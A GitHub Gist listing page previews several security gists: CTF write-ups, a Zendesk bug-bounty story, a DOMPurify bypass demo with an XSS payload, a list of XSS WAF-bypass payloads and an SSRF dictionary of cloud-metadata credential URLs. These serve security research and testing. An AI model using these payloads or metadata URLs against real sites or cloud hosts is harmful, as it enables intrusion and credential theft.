Skip to content

Instantly share code, notes, and snippets.

View superboy-zjc's full-sized avatar

zhong superboy-zjc

41 followers · 186 following
View GitHub Profile
@parrot409
parrot409 / _writeup.md
Last active January 8, 2026 07:24
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache but how does chrome handle this? I deduced that it uses in-memory disk cache and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to cache miss in incognito mode but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@hackermondev
hackermondev / zendesk.md
Last active January 21, 2026 17:09
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like support@company.com), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@kevin-mizu
kevin-mizu / app.js
Created July 15, 2024 16:48
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
@terjanq
terjanq / README.md
Last active October 26, 2025 03:03
Another Another CSP | justCTF 2024 | writeup

Another Another CSP by @terjanq

image

Background

This year I created a copycat challenge of another-csp from DiceCTF Quals 2024. It was only solved by 1 team, DiceGang. Although the challenge looked almost identical, the solutions should be strictly different.

The intended solution of the original challenge was to leak one bit of information per admin visit based on crashing the browser renderer process with malicious CSS. (The below snippet was crashing the browser, but currently it's fixed)

@sorny
sorny / x11_forwarding_macos_docker.md
Last active January 15, 2026 16:25
X11 forwarding with macOS and Docker

X11 forwarding on macOS and docker

A quick guide on how to setup X11 forwarding on macOS when using docker containers requiring a DISPLAY. Works on both Intel and M1 macs!

This guide was tested on:

  • macOS Catalina 10.15.4
  • docker desktop 2.2.0.5 (43884) - stable release
  • XQuartz 2.7.11 (xorg-server 1.18.4)
  • Macbook Pro (Intel)
@MineRobber9000
MineRobber9000 / README.md
Last active April 27, 2025 19:58
A small script that prints function signatures based on ast.FunctionDef objects. Handles hint typing and defaults.

print_funcdefs.py

A small script that prints function signatures based on ast.FunctionDef objects. Handles hint typing and defaults.

Usage:

$ python print_funcdefs.py -h
usage: print_funcdefs.py [-h] [-v] file

Prints function signatures from a file (based on the AST representation).
@klzgrad
klzgrad / TLS指纹调查.md
Last active May 22, 2025 08:19
@zetc0de
zetc0de / xss-bypass-waf
Last active January 9, 2024 09:20
XSS Bypass WAF
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
@paul-axe
paul-axe / insomnihack2019teaser_droops_writeup.md
Created January 20, 2019 12:42
insomnihack2019teaser_droops_writeup.md

The challenge was based on drupal7 with obvious unserialize call added.

Trying to build a chain and the first solution i found was based on following chain:

./includes/bootstrap.inc

abstract class DrupalCacheArray
    ...
    public function __destruct() {
        $data = array();
@jhaddix
jhaddix / cloud_metadata.txt
Last active January 22, 2026 16:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key